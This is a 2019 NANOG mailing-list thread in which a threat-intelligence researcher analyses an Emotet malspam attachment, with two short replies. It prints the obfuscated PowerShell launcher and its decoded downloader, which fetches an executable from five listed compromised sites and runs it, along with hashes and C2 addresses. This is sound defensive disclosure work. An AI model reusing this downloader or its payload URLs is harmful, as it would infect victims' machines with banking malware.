29 May 2019: Emotet malspam: 'Mykolab Ref Id: I32560' [Was: Re: Spamming of NANOG list members]
*Just an FYI, the obfuscated URLs and IPs below are malicious.* This is apparently (?) part of a wave of spoofed malspams impersonating messages with ‘weaponized' attachments sent to the NANOG (North American Network Operators Group) mailing list. Background: https://mailman.nanog.org/pipermail/nanog/2019-May/101140.html Details: Date: Wed, 29 May 2019 10:03:04 -0500 From: "NANOG" <Helene.Rouleau@paral.ca> To: "Paul Ferguson" <fergdawgster@mykolab.com> Subject: Mykolab Ref Id: I32560 X-Authenticated-Sender: s214.panelboxmanager.com Return-Path: <Helene.Rouleau@paral.ca> Attachment: "ATTACHMENT 654860 I32560.doc" MD5: 49fbc31d5e46d83c4741d64a1c268e8d SHA-1: 62b00133e2a78063b76a473a9c0b42a00b3042b8 SHA256: 8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5 File Type: MS Word Document Magic CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: North Dakota, Subject: Maine, Author: Darrell Hammes, Comments: Tunisia policy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 28 12:55:00 2019, Last Saved Time/Date: Tue May 28 12:55:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 90, Security: 0 SSDeep: 3072:t1b77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qSp8ALPmiuVvbIF/j9G5:Pb77HUUUUUUUUUUUUUUUUUUUT52VP61Z TRiD: Microsoft Word document (54.2%) Microsoft Word document (old ver.) (32.2%) Generic OLE2 / Multistream Compound File (13.5%) File Size: 136.38 KB Analysis: VT: https://www.virustotal.com/#/file/8c401ced381ce742105acae9b3d39d2f01681d4e3c... HA: https://www.hybrid-analysis.com/sample/8c401ced381ce742105acae9b3d39d2f01681... Joe Sandbox: https://www.joesandbox.com/analysis/136644/0/executive app.anny.run: https://app.any.run/tasks/18d747ef-42d6-40e8-b496-6eb54c5f5dac Embedded Powershell script does: WINWORD.EXE /n "C:\ATTACHMENT654860I32560.doc" (PID: 3256) powershell.exe powershell -nop -e JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzAGwAJwA7ACQAUgB3AFkASwBDAHYATwAgAD0AIAAnADkAMwA2ACcAOwAkAFEAQgBWAGEAZAA5AD0AJwBMADgASABEAHoATgAnADsAJAB3AFgAcABiAFYAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgB3AFkASwBDAHYATwArACcALgBlAHgAZQAnADsAJABHAEEAaQB6AHoANwA9ACcARABPAEkAbwBTAFQAJwA7ACQAVABiADkARQB1ADIASQByAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdABgAC4AVwBlAEIAQwBgAEwAYABJAEUATgB0ADsAJABrAHUAVwBfAG8ANwBTADUAPQAnAGgAdAB0AHAAOgAvAC8AYwBlAG8ALgBjAGEAbABjAHUAcwAuAGMAbwBtAC8AcABvAHMAdABuAGUAdwBvAC8AUgB3AGgAdgBPAGwAWgBJAHMALwBAAGgAdAB0AHAAOgAvAC8AbABhAHMAdABtAGkAbgB1AHQAZQBsAG8AbABsAGkAcABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEARQBRAGwAcABwAGQAbABmAG8ALwBAAGgAdAB0AHAAOgAvAC8AawBhAHMAaABtAGkAcgBoAGEAYwBrAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AFEAWABoAG8AcgB0AFMAZgBKAC8AQABoAHQAdABwADoALwAvAG8AbQBlAGcAYQBjAG8AbgBzAHUAbAB0AG8AcgBpAGEAYwBvAG4AdABhAGIAaQBsAC4AYwBvAG0ALgBiAHIALwBzAGkAdABlAC8AdwBBAEsAawBiAE8ARQB3AHkALwBAAGgAdAB0AHAAOgAvAC8AbgBvAHQAdABzAHAAYwByAGUAcABhAGkAcgAuAGMAbwAuAHUAawAvAG4AeQBlAC8AaABLAFoAbABEAHYAUABmAHkALwAnAC4AUwBQAEwAaQBUACgAJwBAACcAKQA7ACQAbwA3AFYAQgBRAHQAbABiAD0AJwBPADEAWQBHAGIAMABwACcAOwBmAG8AcgBlAGEAYwBoACgAJAB6ADMAUgB2ADMAagB2ACAAaQBuACAAJABrAHUAVwBfAG8ANwBTADUAKQB7AHQAcgB5AHsAJABUAGIAOQBFAHUAMgBJAHIALgBEAG8AdwBOAEwATwBhAGQARgBJAEwARQAoACQAegAzAFIAdgAzAGoAdgAsACAAJAB3AFgAcABiAFYAcAApADsAJABpAFkAcABPAFkAYwBMAFYAPQAnAFgAMAA2AGoAUwBSADIANAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHcAWABwAGIAVgBwACkALgBsAEUAbgBnAFQASAAgAC0AZwBlACAAMgA5ADcAOAAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAQQBSAFQAKAAkAHcAWABwAGIAVgBwACkAOwAkAFYASABUAE8AbwB1AHcAPQAnAEkAXwBXAGsAMgBiAEgAcgAnADsAYgByAGUAYQBrADsAJABFAFgAWABtAEIAbQBYAD0AJwByAGsARgBLAEMAVAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAEEAdQB0AGEAWQA9ACcAWQBuAFYAcQAzAEoASgAnAA== (PID: 2624,Additional Context: $ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus[.]com/postnewo/RwhvOlZIs/@http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/@http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/@http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z3Rv3jv, $wXpbVp);$iYpOYcLV='X06jSR24';If ((&('Get-'+'Ite'+'m') $wXpbVp).lEngTH -ge 29780) {[Diagnostics.Process]::START($wXpbVp);$VHTOouw='I_Wk2bHr';break;$EXXmBmX='rkFKCT'}}catch{}}$SAutaY='YnVq3JJ') 936.exe (PID: 2888) 24/72 936.exe --26d066e0 (PID: 2932) 24/72 enablerouting.exe (PID: 272) 'Payload quintet' from script above (compromised pages): http://ceo.calcus[.]com/postnewo/RwhvOlZIs/ http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/ http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/ http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/ http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/' Observed network activity: GET ceo.calcus[.]com/postnewo/RwhvOlZIs/ GET lastminutelollipop[.]com/wp-admin/aEQlppdlfo/ POST 31.12.67[.]62:7080/acquire/tlb/ringin/ Non-authoritative answer: Name: ceo.calcus[.]com Address: 68.183.65[.]234 Non-authoritative answer: Name: lastminutelollipop[.]com Address: 158.69.127[.]22 Non-authoritative answer: Name: kashmirhackers[.]com Address: 173.249.2[.]31 Non-authoritative answer: Name: omegaconsultoriacontabil[.]com.br Address: 74.63.242[.]18 Non-authoritative answer: Name: nottspcrepair[.]co.uk Address: 185.38.44[.]163 AS | IP | AS Name 14061 | 68.183.65[.]234 | DIGITALOCEAN-ASN - DigitalOcean, LLC, US (shared hosting) 16276 | 158.69.127[.]22 | OVH, FR (shared hosting) 51167 | 173.249.2[.]31 | CONTABO, DE (shared hosting) 46475 | 74.63.242[.]18 | LIMESTONENETWORKS - Limestone Networks, Inc., US (shared hosting) 33182 | 185.38.44[.]163 | DIMENOC - HostDime.com, Inc., US (shared hosting) 44099 | 31.12.67[.]62 | RUNISO-AS RUNISO Autonomous System, FR (appears to be stand-alone IP, no PTR record) FYI, - ferg — Paul Ferguson Principal, Threat Intelligence Gigamon Seattle, Washington, USA
* fergdawgster@mykolab.com (Paul Ferguson) [Wed 29 May 2019, 18:04 CEST]:
This is apparently (?) part of a wave of spoofed malspams impersonating messages with ‘weaponized' attachments sent to the NANOG (North American Network Operators Group) mailing list.
They're not sent to the list, they're sent directly to posted who have previously posted to the list. NANOG have no way to stop these. -- Niels.
On May 29, 2019, at 9:14 AM, Niels Bakker <niels=nanog@bakker.net> wrote:
* fergdawgster@mykolab.com (Paul Ferguson) [Wed 29 May 2019, 18:04 CEST]:
This is apparently (?) part of a wave of spoofed malspams impersonating messages with ‘weaponized' attachments sent to the NANOG (North American Network Operators Group) mailing list.
They're not sent to the list, they're sent directly to posted who have previously posted to the list. NANOG have no way to stop these.
-- Niels.
Understood, but I figured folks might like to know what they might be dealing with. Cheers, - ferg — Paul Ferguson Principal, Threat Intelligence Gigamon Seattle, Washington, USA
On Wed, 29 May 2019, Paul Ferguson wrote:
AS | IP | AS Name 14061 | 68.183.65[.]234 | DIGITALOCEAN-ASN - DigitalOcean, LLC, US (shared hosting) 16276 | 158.69.127[.]22 | OVH, FR (shared hosting) 51167 | 173.249.2[.]31 | CONTABO, DE (shared hosting) 46475 | 74.63.242[.]18 | LIMESTONENETWORKS - Limestone Networks, Inc., US (shared hosting) 33182 | 185.38.44[.]163 | DIMENOC - HostDime.com, Inc., US (shared hosting) 44099 | 31.12.67[.]62 | RUNISO-AS RUNISO Autonomous System, FR (appears to be stand-alone IP, no PTR record)
few suprises here. known complacent/spam-friendly providers. -Dan
participants (3)
-
Dan Hollis
-
Niels Bakker
-
Paul Ferguson